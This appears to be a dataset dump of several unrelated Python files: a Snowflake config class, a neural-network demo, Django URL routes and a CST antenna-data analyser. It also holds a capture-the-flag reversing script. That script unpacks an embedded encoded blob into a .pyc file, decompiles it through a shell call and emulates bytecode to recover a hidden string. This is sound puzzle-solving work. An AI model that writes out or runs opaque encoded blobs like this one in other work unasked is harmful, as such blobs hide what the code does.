content
stringlengths 0
1.05M
| origin
stringclasses 2
values | type
stringclasses 2
values |
|---|---|---|
from dataclasses import dataclass, field
from typing import Optional
from serde import deserialize
from metaphor.common.filter import DatasetFilter
from metaphor.snowflake.auth import SnowflakeAuthConfig
from metaphor.snowflake.utils import DEFAULT_THREAD_POOL_SIZE
@deserialize
@dataclass
class SnowflakeRunConfig(SnowflakeAuthConfig):
# Include or exclude specific databases/schemas/tables
filter: Optional[DatasetFilter] = field(default_factory=lambda: DatasetFilter())
# Max number of concurrent queries to database
max_concurrency: Optional[int] = DEFAULT_THREAD_POOL_SIZE
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
#####################################################################
# Peach - Python para Inteligência Computacional
# José Alexandre Nalon
#
# Este arquivo: demo07.py
# Demonstração e teste, Mapeamento de uma função não linear.
#####################################################################
from numpy import *
import random
import peach as p
# Explicação deste demo.
#
# É possível utilizar uma rede neural para fazer o mapeamento
# de uma função não linear, como uma senóide ou outra seme-
# lhante. A técnica vai exigir uma rede neural mais complexa,
# com uma entrada, mas com uma camada escondida relativamente
# complexa. A camada de saída deve ter como função de ativação
# a identidade, para somar os mapeamentos realizados.
# Criamos aqui a rede neural. N é a ordem do polinômio,
# que deixamos indicada na forma de uma variável para
# permitir fáceis adaptações. A função de ativação é a
# identidade, e o método de aprendizado é o back-propa-
# gation (por default).
# Utilizamos várias saídas, igualmente distribuídas ao
# redor do ponto de avaliação para que o erro obtido seja
# mais significativo, onde existir. Nesse caso, o ponto de
# avaliação será igual a int(inputs/2). O uso de uma vizi-
# nhança maior possibilitará melhores resultados.
inputs = 7
nn = p.FeedForward((inputs, 200, inputs), lrule=p.BackPropagation(0.01), bias=True)
nn.phi = (p.Sigmoid, p.Linear)
delta = linspace(-0.1, 0.1, inputs)
elog = [ ]
error = 1
i = 0
while i < 2000:
# Geramos um valor de x e um valor da resposta
# desejada. Com x, encontramos xo, que será o
# vetor de entrada da rede neural:
xo = random.uniform(-1.0, 1.0)
x = xo + delta
d = sin(pi*x)
# Fazemos a predição, calculamos o erro e realizamos
# o aprendizado da rede.
y = nn(x)
error = nn.learn(x, d)
elog.append(error)
# Incrementamos o contador de tentativas.
i = i + 1
# Se o sistema tiver o pacote gráfico matplotlib instalado,
# então o demo tenta criar um gráfico da função original,
# contrastada com a função predita. O gráfico é salvo no
# arquivo demo07.eps.
try:
from matplotlib import *
from matplotlib.pylab import *
x = linspace(-1, 1, 200)
y = sin(pi*x)
ye = [ ]
for xo in x:
yn = nn(delta + xo)
ye.append(yn[int(inputs/2)])
ye = array(ye)
subplot(211)
hold(True)
grid(True)
plot(x, y, 'b--')
plot(x, ye, 'g')
xlim([ -1, 1 ])
legend([ "$y$", "$\hat{y}$" ])
subplot(212)
grid(True)
plot(arange(0, 2000, 10), array(elog, dtype=float)[::10])
savefig("demo07.eps")
except ImportError:
pass
|
nilq/baby-python
|
python
|
from django.conf.urls import url
from .import views
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
url(r'^$', views.home_teamlead),
url(r'^index_teamlead$', views.index_teamlead, name='index_teamlead'),
url(r'^holidays_teamlead$', views.holidays_teamlead, name='holidays_teamlead'),
url(r'^attendance_teamlead$', views.attendance_teamlead, name='attendance_teamlead'),
url(r'^salary_teamlead$', views.salary_teamlead, name='salary_teamlead'),
url(r'^salaryview_teamlead$', views.salaryview_teamlead, name='salaryview_teamlead'),
url(r'^profile_teamlead$', views.profile_teamlead, name='profile_teamlead'),
url(r'^editprofile_teamlead$', views.editprofile_teamlead, name='editprofile_teamlead'),
url(r'^compose_teamlead$', views.compose_teamlead, name='compose_teamlead'),
url(r'^changepwd_teamlead$', views.changepwd_teamlead, name='changepwd_teamlead'),
url(r'^leavesRequest_teamlead$', views.leave_teamlead, name='leave_teamlead'),
url(r'^mailview_teamlead$', views.mailview_teamlead, name='mailview_teamlead'),
url(r'^employee_teamlead$', views.employee_teamlead, name='employee_teamlead'),
]
|
nilq/baby-python
|
python
|
from base64 import b64decode
from zlib import decompress
from os import system
inputFile = "handcrafted-pyc.py_bc552f58fe2709225ca0768c131dd14934a47305"
magicHeader = b"\x03\xf3\x0d\x0a\xfb\x1c\x32\x59"
outputPycFile = "dump.pyc"
outputSrcFile = "output.py"
uncompyleExe = "uncompyle6"
code = 'eJyNVktv00AQXm/eL0igiaFA01IO4cIVCUGFBBJwqRAckLhEIQmtRfPwI0QIeio/hRO/hJ/CiStH2M/prj07diGRP43Hs9+MZ2fWMxbnP6mux' \
'+oK9xVMHPFViLdCTB0xkeKDFEFfTIU4E8KZq8dCvB4UlN3hGEsdddXU9QTLv1eFiGKGM4cKUgsFCNLFH7dFrS9poayFYmIZm1b0gyqxMOwJaU' \
'3r6xs9sW1ooakXuRv+un7Q0sIlLVzOCZq/XtsK2oTSYaZlStogXi1HV0iazoN2CV2HZeXqRQ54TlJRb7FUlKyUatISsdzo+P7UU1Gb1POdMru' \
'ckepGwk9tIXQTftz2yBaT5JQovWvpSa6poJPuqgao+b9l5Aj/R+mLQIP4f6Q8Vb3g/5TB/TJxWGdZr9EQrmn99fwKtTvAZGU7wzS7GNpZpDm2' \
'JgCrr8wrmPoo54UqGampFIeS9ojXjc4E2yI06bq/4DRoUAc0nVnng4k6p7Ks0+j/S8z9V+NZ5dhmrJUM/y7JTJeRtnJ2TSYJvsFq3CQt/vnfq' \
'mQXt5KlpuRcIvDAmhnn2E0t9BJ3SvB/SfLWhuOWNiNVZ+h28g4wlwUp00w95si43rZ3r6+fUIEdgOZbQAsyFRRvBR6dla8KCzRdslar7WS+a5' \
'HFb39peIAmG7uZTHVm17Czxju4m6bayz8e7J40DzqM0jr0bmv9PmPvk6y5z57HU8wdTDHeiUJvBMAM4+0CpoAZ4BPgJeAYEAHmgAUgAHiAj4A' \
'VAGORtwd4AVgC3gEmgBBwCPgMWANOAQ8AbwBHgHuAp4D3gLuARwoGmNUizF/j4yDC5BWM1kNvvlxFA8xikRrBxHIUhutFMBlgQoshhPphGAXe' \
'/OggKqqb2cibxwuEXjUcQjccxi5eFRL1fDSbKrUhy2CMb2aLyepkegDWsBwPlrVC0/kLHmeCBQ== '
content = decompress(b64decode(code))
file = open(outputPycFile, 'wb')
data = magicHeader + content
file.write(data)
file.close()
system(f"{uncompyleExe} {outputPycFile} > {outputSrcFile}")
def ROT_TWO(_list):
if len(_list) >= 2:
a = _list.pop()
b = _list.pop()
_list.append(a)
_list.append(b)
return _list
def BINARY_ADD(_list):
if len(_list) >= 2:
a = _list.pop()
b = _list.pop()
_list.append(b + a)
return _list
stack = []
for line in open(outputSrcFile):
if "LOAD_CONST" in line:
try:
stack.append(chr(int(line.split()[2])))
except ValueError:
pass
elif "ROT_TWO" in line:
stack = ROT_TWO(stack)
elif "BINARY_ADD" in line:
stack = BINARY_ADD(stack)
print(stack)
|
nilq/baby-python
|
python
|
import numpy as np
from scipy.signal import find_peaks
import os
import pycst_ctrl
class PyCstDataAnalyser:
""" Used to analyse data exported by CST"""
def __init__(self, opts):
# Initialize attributes
# Polarization indicator
self.pol_ind = opts.get('pol_ind', 'lin_dir')
# Samples in CST farfield data
self.np_theta = opts.get('np_theta', 360)
self.np_phi = opts.get('np_phi', 5)
# Normalization factor for all objective value,
# all object values will be normalized by (goal_val*norm_factor), which represents the relative tolerance
# for each goal. This factor aims to bring multiple types of objective values into same range in
# one cost function.
self.norm_factor = opts.get('norm_factor', 0.1)
# Taper definition in dB
self.taper = opts.get('taper', -12)
# Weight for rotational symmetry evaluation
self.rotsym_goal_val = opts.get('rotsym_goal_val', 0)
self.rotsym_weight = opts.get('rotsym_weight', 0)
# Goal and Weight for cx-pol level evaluation
self.cxlevel_goal_val = opts.get('cxlevel_goal_val', -35)
self.cxlevel_weight = opts.get('cxlevel_weight', 0)
# Goal and Weight for taper angle evaluation
self.taperang_goal_range = opts.get('taperang_goal_range', np.array([10, 24]))
self.taperang_weight = opts.get('taperang_weight', 0)
# Goal and Weight for SLL evaluation
self.sll_goal_val = opts.get('sll_goal_val', -30)
self.sll_weight = opts.get('sll_weight', 0)
# Goal and weight for Farfield AR evaluation
self.ar_ff_goal = opts.get('ar_ff_goal', 0)
# self.ar_ff_max_goal = opts.get('ar_ff_max_goal', 3)
self.ar_ff_mae_weight = opts.get('ar_ff_mae_weight', 0)
self.ar_ff_max_weight = opts.get('ar_ff_max_weight', 0)
# Frequency range within which the S parameters are requested to be evaluated
self.spara_eva_freq_range_vec = opts.get('spara_eva_freq_range_vec', np.array([85, 110]))
# Goal and Weight for S11 evaluation in db value
self.spara_file_name_lst = opts.get('spara_file_name_lst', ['S-Parameters_S1(1),1(1).txt'])
self.spara_goal_lst = opts.get('spara_goal_lst', [-40])
self.spara_mae_weight_lst = opts.get('spara_mae_weight_lst', [0])
self.spara_maxnorm_weight_lst = opts.get('spara_maxnorm_weight_lst', [0])
# Goal and Weight for S11 evaluation in linear value
self.spara_lin_goal_lst = opts.get('spara_lin_goal_lst', [0.01])
self.spara_lin_mae_weight_lst = opts.get('spara_lin_mae_weight_lst', [0])
self.spara_lin_max_weight_lst = opts.get('spara_lin_max_weight_lst', [0])
if len(self.spara_goal_lst) == len(self.spara_file_name_lst):
self.spara_eval_db = True
else:
self.spara_eval_db = False
if len(self.spara_lin_goal_lst) == len(self.spara_file_name_lst):
self.spara_eval_lin = True
else:
self.spara_eval_lin = False
# Frequency range within which the NR AR are requested to be evaluated
self.nf_ar_eva_freq_range_vec = opts.get('nf_ar_eva_freq_range_vec', np.array([85, 110]))
# Goal and Weight for nearfield AR evaluation
self.nf_ar_file_name = opts.get('nf_ar_file_name', 'AR_AllFreq.txt')
self.nf_ar_goal = opts.get('nf_ar_goal', 0)
self.nf_ar_mae_weight = opts.get('nf_ar_mae_weight', 0)
self.nf_ar_maxnorm_weight = opts.get('nf_ar_maxnorm_weight', 0)
@staticmethod
def func_taper_angle_get(theta_vec, dir_co_norm_arr, taper):
index_barr = dir_co_norm_arr >= taper
theta_arr = np.vstack((theta_vec, theta_vec, theta_vec))
theta_arr_tapered = theta_arr[index_barr]
taper_ang = np.amax(np.absolute(theta_arr_tapered))
return taper_ang
@staticmethod
def func_exp_ff_data_proc(export_folder, filename, np_theta, np_phi, pol_ind='RHCP'):
# Get export farfield data file
full_exp_ff_file = os.path.join(export_folder, filename)
# Load data
headerlin = 2
cut_data = np.genfromtxt(full_exp_ff_file, skip_header=headerlin)
# Get Theta (Col.1)
theta_arr = cut_data[:, 0].reshape(np_phi, np_theta)
theta_arr = np.c_[theta_arr, 360 + theta_arr[:, 0]]
theta_vec = theta_arr[0, :]
# Decide data column index for co-pol and cx-pol
if pol_ind == 'LHCP':
co_col_index = 3
cx_col_index = 5
else: # pol_ind = 'RHCP' or 'lin_dir'
co_col_index = 5
cx_col_index = 3
# Get directivity for Co-Pol (Col.4 is LHCP, Col.6 is RHCP or Co-pol if linear direction is chose) for each cut
dir_co_all = cut_data[:, co_col_index].reshape(np_phi, np_theta)
dir_co_arr = dir_co_all[2:5, :]
dir_co_arr = np.c_[dir_co_arr, dir_co_arr[:, 0]]
peak_co_cvec = dir_co_arr[:, np_theta // 2, np.newaxis] # Transform to (3,1) column vector
dir_co_norm_arr = dir_co_arr - peak_co_cvec
# Get directivity for Cx-Pol (Col.4 is LHCP, Col.6 is RHCP or Cx-pol if linear direction is chose) for each cut
dir_cx_all = cut_data[:, cx_col_index].reshape(np_phi, np_theta)
dir_cx_arr = dir_cx_all[2:5, :]
dir_cx_arr = np.c_[dir_cx_arr, dir_cx_arr[:, 0]]
peak_cx_cvec = dir_cx_arr.max(axis=1).reshape(-1, 1)
dir_cx_norm_arr = dir_cx_arr - peak_co_cvec
# Get directivity for Abs (Col.3) for each cut
dir_abs_all = cut_data[:, 2].reshape(np_phi, np_theta)
dir_abs_arr = dir_abs_all[2:5, :]
dir_abs_arr = np.c_[dir_abs_arr, dir_abs_arr[:, 0]]
peak_abs_cvec = dir_abs_arr[:, np_theta // 2, np.newaxis] # Transform to (3,1) column vector
dir_abs_norm_arr = dir_abs_arr - peak_abs_cvec
# Get AR (Col.8) for each cut
ar_all = cut_data[:, 7].reshape(np_phi, np_theta)
ar_arr = ar_all[2:5, :]
ar_arr = np.c_[ar_arr, ar_arr[:, 0]]
ar_boresight_cvec = ar_arr[:, np_theta // 2, np.newaxis] # Transform to (3,1) column vector
return theta_vec, dir_co_arr, dir_cx_arr, dir_abs_arr, \
dir_co_norm_arr, dir_cx_norm_arr, dir_abs_norm_arr, \
peak_co_cvec, peak_cx_cvec, peak_abs_cvec, \
ar_arr, ar_boresight_cvec
def func_rotsym_objval_calc_mse(self, theta_vec, dir_co_norm_arr, taper, goal_val, weight):
"""
This function calculates the weighted MSE between radiation pattern of each cut and average radiation pattern,
the result is a scalar value which represents the rotational symmetry at this frequency.
The goal and weight have already been considered in the return value at this frequency sample, so the return
value could be used to calculate truncated MAE over all frequency samples.
"""
# Get the taper angle
taper_ang = self.func_taper_angle_get(theta_vec, dir_co_norm_arr, taper)
angle_range = np.array([-taper_ang, taper_ang])
# Get theta vector within the taper angle
index_bvec = np.logical_and(theta_vec >= angle_range[0], theta_vec <= angle_range[1])
theta_tapered_vec = theta_vec[index_bvec]
# Calculate weight for directivity at different theta
radpat_weight_vec = 10 ** ((-1) * (np.absolute(theta_tapered_vec) / taper_ang))
# Calculate MSE between radiation pattern of each cut and average radiation pattern
index_barr = np.vstack((index_bvec, index_bvec, index_bvec))
dir_co_norm_tapered_arr = dir_co_norm_arr[index_barr].reshape(-1, len(theta_tapered_vec))
dir_co_norm_avg_tapered_vec = np.mean(dir_co_norm_tapered_arr, axis=0)
# Calculate difference based on array broadcasting
dir_co_sqrdiff_tapered_arr = (dir_co_norm_tapered_arr - dir_co_norm_avg_tapered_vec) ** 2
mse_vec = np.mean(dir_co_sqrdiff_tapered_arr * radpat_weight_vec, axis=1)
# Calculate objective value
objective_val = max(mse_vec.sum() - goal_val, 0)
objective_val *= weight
return objective_val
@staticmethod
def func_cxlevel_objval_calc_trunc(dir_cx_norm_arr, goal_val, weight, norm_factor):
"""
This function calculates the cx-level which is the maximum level of normalized cx-pol among all cuts at one
frequency.
The goal and weight have already been considered in the return value at this frequency sample, so the return
value could be used to calculate truncated MAE over all frequency samples.
"""
# Get the maximum level of normalized cx-pol among all cuts
cxlevel = np.amax(dir_cx_norm_arr)
# Calculate truncated objective value
objective_val = max((cxlevel - goal_val), 0) / (abs(goal_val) * norm_factor)
objective_val *= weight
return objective_val
def func_taperang_objval_calc_rangetrunc(self, theta_vec, dir_co_norm_arr, taper, goal_range, weight, norm_factor):
"""
This function calculates the truncated difference between simulated taper angle and expected taper angle range
at one frequency.
The goal and weight have already been considered in the return value at this frequency sample, so the return
value could be used to calculate truncated MAE over all frequency samples.
"""
# Get the max taper angle of the radiation pattern
taper_ang = self.func_taper_angle_get(theta_vec, dir_co_norm_arr, taper)
range_cent = goal_range.mean()
if (taper_ang >= goal_range[0]) and (taper_ang <= goal_range[1]):
objective_val = 0 # Objective is 0 if simulated taper angle is in the expected range
else:
objective_val = abs(taper_ang - range_cent) / (range_cent * norm_factor)
objective_val *= weight
return objective_val
@staticmethod
def func_sll_max_get(dir_co_norm_arr):
"""
This function gets the max SLL of all cuts
"""
cut_num = dir_co_norm_arr.shape[0]
# Initialize an array to store SLL value of each cut
sll_val_vec = np.zeros(cut_num)
for i in range(cut_num):
# Get peaks of each cut
dir_co_norm_cut_vec = dir_co_norm_arr[i, :]
peak_index, properties = find_peaks(dir_co_norm_cut_vec)
peaks = dir_co_norm_cut_vec[peak_index]
# Sort peaks in ascending order
pks_sort = np.sort(peaks)
if 0 == len(pks_sort): # Probably there is no radiation at all due to large reflection coefficient
sll_val_vec[i] = 65535
elif 1 == len(pks_sort):
sll_val_vec[i] = -128 # Set SLL value to a value that will always be lower than the goal
else:
sll_val_vec[i] = pks_sort[-2] # Not always the 1st sidelobe but the highest one
sll_val_max = np.amax(sll_val_vec)
return sll_val_max
def func_sll_objval_calc_trunc(self, dir_co_norm_arr, goal_val, weight, norm_factor):
"""
This function calculates truncated difference between max SLL of all cuts and expected SLL at this frequency
The goal and weight have already been considered in the return value at this frequency sample, so the return
value could be used to calculate truncated MAE over all frequency samples.
"""
# Get max SLL of all cuts
sll_val_max = self.func_sll_max_get(dir_co_norm_arr)
objective_val = max((sll_val_max - goal_val), 0) / (abs(goal_val) * norm_factor)
objective_val *= weight
return objective_val
@staticmethod
def func_ar_ff_objval_calc_maetrunc(theta_vec, ar_arr, angle_range, goal_val, weight, norm_factor):
"""
This function calculates the truncated MAE of AR over given beamwidth (angle range) at one frequency
The goal and weight have already been considered in the return value at this frequency sample, so the return
value could be used to calculate truncated MAE over all frequency samples.
"""
# Get AR array within the taper angle
index_bvec = np.logical_and(theta_vec >= angle_range[0], theta_vec <= angle_range[1])
theta_tapered_vec = theta_vec[index_bvec]
index_barr = np.vstack((index_bvec, index_bvec, index_bvec))
ar_tapered_arr = ar_arr[index_barr].reshape(-1, len(theta_tapered_vec))
# Get the max AR over the given beamwidth among all cuts
max_ar_tapered_vec = np.amax(ar_tapered_arr, axis=0)
# Calculate the truncated difference simulated AR and expected AR over the given beamwidth
diff_trunc_vec = np.maximum((max_ar_tapered_vec - goal_val), 0)
# objective_val = diff_trunc_vec.mean() / (abs(goal_val) * norm_factor)
objective_val = diff_trunc_vec.mean() / (abs(goal_val))
objective_val *= weight
return objective_val
@staticmethod
def func_ar_ff_objval_calc_maxtrunc(theta_vec, ar_arr, angle_range, goal_val, weight, norm_factor):
"""
This function calculates truncated difference between max AR over given beamwidth for all cuts at one frequency
The goal and weight have already been considered in the return value at this frequency sample, so the return
value could be used to calculate truncated MAE over all frequency samples.
"""
# Get AR array within the taper angle
index_bvec = np.logical_and(theta_vec >= angle_range[0], theta_vec <= angle_range[1])
theta_tapered_vec = theta_vec[index_bvec]
index_barr = np.vstack((index_bvec, index_bvec, index_bvec))
ar_tapered_arr = ar_arr[index_barr].reshape(-1, len(theta_tapered_vec))
# Get the max AR among all cuts
max_ar_tapered_vec = np.amax(ar_tapered_arr, axis=0)
# Limit the evaluate frequency range
diff_trunc_vec = np.maximum((max_ar_tapered_vec - goal_val), 0)
max_diff_trunc = diff_trunc_vec.max()
# objective_val = max_diff_trunc / (abs(goal_val) * norm_factor)
objective_val = max_diff_trunc / (abs(goal_val))
# objective_val = max_diff_trunc
objective_val *= weight
return objective_val
@staticmethod
def func_cst_spara_data_proc(exp_data_folder, singlerun_data_folder_name, spara_filename):
# Get export S Para data file
full_spara_file = os.path.join(exp_data_folder, singlerun_data_folder_name, spara_filename)
# Load data
headerlin = 0
spara_data = np.genfromtxt(full_spara_file, skip_header=headerlin)
# Parses data
freq_vec = spara_data[:, 0]
s_mag_lin = spara_data[:, 1]
s_mag_db = 20 * np.log10(s_mag_lin)
return freq_vec, s_mag_lin, s_mag_db
@staticmethod
def func_meas_spara_data_proc(meas_data_folder, meas_spara_filename):
"""
Process s-parameter data measured by Keysight PNA-X with OML mmWave head
"""
# Get export S Para data file
meas_spara_filepath = os.path.join(meas_data_folder, meas_spara_filename)
# Load data
headerlin = 7
delimiter_str = ","
spara_data = np.genfromtxt(meas_spara_filepath, skip_header=headerlin, delimiter=delimiter_str)
# Parses data
freq_vec = spara_data[:, 0] / 1e9 # Convert to GHz
s_mag_db = spara_data[:, 1]
s_ph_deg = spara_data[:, 2]
return freq_vec, s_mag_db, s_ph_deg
@staticmethod
def func_spara_objval_calc_maetrunc(export_folder, filename, goal_val, freq_range_vec, weight, norm_factor):
# Get export S Para data file
full_spara_file = os.path.join(export_folder, filename)
# Load data
headerlin = 0
spara_data = np.genfromtxt(full_spara_file, skip_header=headerlin)
# Parses data
freq_vec = spara_data[:, 0]
s_mag_lin = spara_data[:, 1]
s_mag_db = 20 * np.log10(s_mag_lin)
# s_phase = spara_data[:, 2]
# Limit the evaluate frequency range
index_bvec = np.logical_and(freq_vec >= freq_range_vec[0], freq_vec <= freq_range_vec[1])
diff_trunc_vec = np.maximum((s_mag_db[index_bvec] - goal_val), 0)
objective_val = diff_trunc_vec.mean() / (abs(goal_val) * norm_factor)
objective_val *= weight
return objective_val
@staticmethod
def func_spara_objval_calc_maxnormtrunc(export_folder, filename, goal_val, freq_range_vec, weight, norm_factor):
# Get export S Para data file
full_spara_file = os.path.join(export_folder, filename)
# Load data
headerlin = 0
spara_data = np.genfromtxt(full_spara_file, skip_header=headerlin)
# Parses data
freq_vec = spara_data[:, 0]
s_mag_lin = spara_data[:, 1]
s_mag_db = 20 * np.log10(s_mag_lin)
# s_phase = spara_data[:, 2]
# Limit the evaluate frequency range
index_bvec = np.logical_and(freq_vec >= freq_range_vec[0], freq_vec <= freq_range_vec[1])
diff_trunc_vec = np.maximum((s_mag_db[index_bvec] - goal_val), 0)
max_diff_trunc = diff_trunc_vec.max()
objective_val = max_diff_trunc / (abs(goal_val) * norm_factor)
objective_val *= weight
return objective_val
@staticmethod
def func_spara_lin_objval_calc_maetrunc(export_folder, filename, goal_val, freq_range_vec, weight):
# Get export S Para data file
full_spara_file = os.path.join(export_folder, filename)
# Load data
headerlin = 0
spara_data = np.genfromtxt(full_spara_file, skip_header=headerlin)
# Parses data
freq_vec = spara_data[:, 0]
s_mag_lin = spara_data[:, 1]
# s_mag_db = 20 * np.log10(s_mag_lin)
# s_phase = spara_data[:, 2]
# Limit the evaluate frequency range
index_bvec = np.logical_and(freq_vec >= freq_range_vec[0], freq_vec <= freq_range_vec[1])
diff_trunc_vec = np.maximum((s_mag_lin[index_bvec] - goal_val), 0)
objective_val = diff_trunc_vec.mean()
objective_val *= weight
return objective_val
@staticmethod
def func_spara_lin_objval_calc_maxtrunc(export_folder, filename, goal_val, freq_range_vec, weight):
# Get export S Para data file
full_spara_file = os.path.join(export_folder, filename)
# Load data
headerlin = 0
spara_data = np.genfromtxt(full_spara_file, skip_header=headerlin)
# Parses data
freq_vec = spara_data[:, 0]
s_mag_lin = spara_data[:, 1]
# s_mag_db = 20 * np.log10(s_mag_lin)
# s_phase = spara_data[:, 2]
# Limit the evaluate frequency range
index_bvec = np.logical_and(freq_vec >= freq_range_vec[0], freq_vec <= freq_range_vec[1])
diff_trunc_vec = np.maximum((s_mag_lin[index_bvec] - goal_val), 0)
max_diff_trunc = diff_trunc_vec.max()
objective_val = max_diff_trunc
objective_val *= weight
return objective_val
@staticmethod
def func_nf_ar_objval_calc_maetrunc(export_folder, filename, goal_val, freq_range_vec, weight):
# Get export S Para data file
full_nr_ar_file = os.path.join(export_folder, filename)
# Load data
headerlin = 0
nf_ar_data = np.genfromtxt(full_nr_ar_file, skip_header=headerlin)
# Parses data
freq_vec = nf_ar_data[:, 0]
nf_ar_real = nf_ar_data[:, 1]
# Limit the evaluate frequency range
index_bvec = np.logical_and(freq_vec >= freq_range_vec[0], freq_vec <= freq_range_vec[1])
diff_trunc_vec = np.maximum((nf_ar_real[index_bvec] - goal_val), 0)
objective_val = diff_trunc_vec.mean()
objective_val *= weight
return objective_val
@staticmethod
def func_nf_ar_objval_calc_maxnormtrunc(export_folder, filename, goal_val, freq_range_vec, weight):
# Get export S Para data file
full_nr_ar_file = os.path.join(export_folder, filename)
# Load data
headerlin = 0
nf_ar_data = np.genfromtxt(full_nr_ar_file, skip_header=headerlin)
# Parses data
freq_vec = nf_ar_data[:, 0]
nf_ar_real = nf_ar_data[:, 1]
# Limit the evaluate frequency range
index_bvec = np.logical_and(freq_vec >= freq_range_vec[0], freq_vec <= freq_range_vec[1])
diff_trunc_vec = np.maximum((nf_ar_real[index_bvec] - goal_val), 0)
max_diff_trunc = diff_trunc_vec.max()
objective_val = max_diff_trunc / (abs(goal_val) / 2)
objective_val *= weight
return objective_val
@staticmethod
def func_spara_data_sample_extract(export_folder, filename, freq_limit_vec, sample_num):
# Get export S Para data file
full_spara_file = os.path.join(export_folder, filename)
# Load data
headerlin = 0
spara_data = np.genfromtxt(full_spara_file, skip_header=headerlin)
# Parses data
freq_vec = spara_data[:, 0]
s_mag_lin = spara_data[:, 1]
# s_mag_db = 20 * np.log10(s_mag_lin)
# s_phase = spara_data[:, 2]
# Limit the evaluate frequency range
index_bvec = np.logical_and(freq_vec >= freq_limit_vec[0], freq_vec <= freq_limit_vec[1])
freq_range_vec = freq_vec[index_bvec]
s_mag_range_lin_vec = s_mag_lin[index_bvec]
# Get the samples from the data within the range
data_num = len(s_mag_range_lin_vec) # data points including the first and last points
# Generate sample index between the first index (0) and the last index (data_num -1) (include last index)
sample_index = np.linspace(0, data_num - 1, sample_num).astype(int) # Cast the sample index to integer
freq_sample_vec = freq_range_vec[sample_index]
s_mag_lin_sample_vec = s_mag_range_lin_vec[sample_index]
return freq_sample_vec, s_mag_lin_sample_vec
def func_cst_data_spara_analyse(self, singlerun_export_folder):
# Evaluate S parameters
spara_objval_vec = np.array([])
spara_eva_freq_range_vec = self.spara_eva_freq_range_vec
for i in range(len(self.spara_file_name_lst)):
spara_file_name = self.spara_file_name_lst[i]
if self.spara_eval_db is True: # if configuration is valid
# Goal and weight for spara in db values
spara_goal_val = self.spara_goal_lst[i]
spara_mae_weight = self.spara_mae_weight_lst[i]
spara_maxnorm_weight = self.spara_maxnorm_weight_lst[i]
if spara_mae_weight != 0:
spara_objval_mae = self.func_spara_objval_calc_maetrunc(singlerun_export_folder, spara_file_name,
spara_goal_val, spara_eva_freq_range_vec,
spara_mae_weight, self.norm_factor)
# Form s-para objective value list
spara_objval_vec = np.append(spara_objval_vec, spara_objval_mae)
if spara_maxnorm_weight != 0:
spara_objval_max = self.func_spara_objval_calc_maxnormtrunc(singlerun_export_folder,
spara_file_name, spara_goal_val,
spara_eva_freq_range_vec,
spara_maxnorm_weight, self.norm_factor)
# Form s-para objective value list
spara_objval_vec = np.append(spara_objval_vec, spara_objval_max)
if self.spara_eval_lin is True:
# Goal and weight for spara in linear values
spara_lin_goal_val = self.spara_lin_goal_lst[i]
spara_lin_mae_weight = self.spara_lin_mae_weight_lst[i]
spara_lin_max_weight = self.spara_lin_max_weight_lst[i]
if spara_lin_mae_weight != 0:
spara_lin_objval_mae = self.func_spara_lin_objval_calc_maetrunc(singlerun_export_folder,
spara_file_name, spara_lin_goal_val,
spara_eva_freq_range_vec,
spara_lin_mae_weight)
# Form s-para objective value list
spara_objval_vec = np.append(spara_objval_vec, spara_lin_objval_mae)
if spara_lin_max_weight != 0:
spara_lin_objval_max = self.func_spara_lin_objval_calc_maxtrunc(singlerun_export_folder,
spara_file_name, spara_lin_goal_val,
spara_eva_freq_range_vec,
spara_lin_max_weight)
# Form s-para objective value list
spara_objval_vec = np.append(spara_objval_vec, spara_lin_objval_max)
return spara_objval_vec
def func_cst_data_farfield_analyse(self, singlerun_export_folder, ff_export_sub_folder):
# Get farfield data file list if it exists
ff_export_folder = os.path.join(singlerun_export_folder, ff_export_sub_folder)
if ff_export_sub_folder != "":
# Get all the farfield export data file
farfield_data_file_list = pycst_ctrl.func_file_list_get(ff_export_folder, ext='.txt')
else:
farfield_data_file_list = ""
# Initialize result vectors over all frequency samples
rotsym_objval_vec = np.array([])
cxlevel_objval_vec = np.array([])
taperang_objval_vec = np.array([])
sll_objval_vec = np.array([])
ar_ff_mae_objval_vec = np.array([])
ar_ff_max_objval_vec = np.array([])
for export_file in farfield_data_file_list:
theta_vec, dir_co_arr, dir_cx_arr, dir_abs_arr, \
dir_co_norm_arr, dir_cx_norm_arr, dir_abs_norm_arr, \
peak_co_cvec, peak_cx_cvec, peak_abs_cvec, \
ar_arr, ar_boresight_cvec = \
self.func_exp_ff_data_proc(ff_export_folder, export_file, self.np_theta, self.np_phi, self.pol_ind)
# Calculate rotational symmetry fitness
if self.rotsym_weight != 0:
rotsym_objval_freq = self.func_rotsym_objval_calc_mse(theta_vec, dir_co_norm_arr, self.taper,
self.rotsym_goal_val, self.rotsym_weight)
rotsym_objval_vec = np.append(rotsym_objval_vec, rotsym_objval_freq)
# Calculate Cx-Pol level fitness
if self.cxlevel_weight != 0:
cxlevel_objval_freq = self.func_cxlevel_objval_calc_trunc(dir_cx_norm_arr, self.cxlevel_goal_val,
self.cxlevel_weight, self.norm_factor)
cxlevel_objval_vec = np.append(cxlevel_objval_vec, cxlevel_objval_freq)
# Calculate taper angle fitness
if self.taperang_weight != 0:
taperang_objval_freq = self.func_taperang_objval_calc_rangetrunc(theta_vec, dir_co_norm_arr,
self.taper,
self.taperang_goal_range,
self.taperang_weight, self.norm_factor)
taperang_objval_vec = np.append(taperang_objval_vec, taperang_objval_freq)
# Calculate SLL fitness
if self.sll_weight != 0:
sll_objval_freq = self.func_sll_objval_calc_trunc(dir_co_norm_arr, self.sll_goal_val,
self.sll_weight, self.norm_factor)
sll_objval_vec = np.append(sll_objval_vec, sll_objval_freq)
# Calculate Farfield AR fitness
# Decide theta range for evaluation
taper_ang = self.func_taper_angle_get(theta_vec, dir_co_norm_arr, self.taper)
angle_range = np.array([-taper_ang, taper_ang])
# Calculate fitness over the theta range
if self.ar_ff_mae_weight != 0:
af_ff_mae_objval_freq = self.func_ar_ff_objval_calc_maetrunc(theta_vec, ar_arr, angle_range,
self.ar_ff_goal, self.ar_ff_mae_weight,
self.norm_factor)
ar_ff_mae_objval_vec = np.append(ar_ff_mae_objval_vec, af_ff_mae_objval_freq)
if self.ar_ff_max_weight != 0:
af_ff_max_objval_freq = self.func_ar_ff_objval_calc_maxtrunc(theta_vec, ar_arr, angle_range,
self.ar_ff_goal, self.ar_ff_max_weight,
self.norm_factor)
ar_ff_max_objval_vec = np.append(ar_ff_max_objval_vec, af_ff_max_objval_freq)
# Form radiation pattern objective value list
radpat_objval_vec = np.array([])
if self.rotsym_weight != 0:
